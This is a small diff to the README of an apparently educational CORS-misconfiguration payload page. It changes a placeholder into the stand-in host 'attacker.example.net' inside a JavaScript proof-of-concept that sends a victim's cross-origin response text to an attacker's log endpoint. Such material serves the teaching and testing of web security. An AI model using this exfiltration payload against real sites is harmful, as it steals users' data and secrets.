diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 98f3573..d224ea5 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -112,7 +112,7 @@ origin in the request: req.send(); function reqListener() { - location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText); + location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText); }; "> ```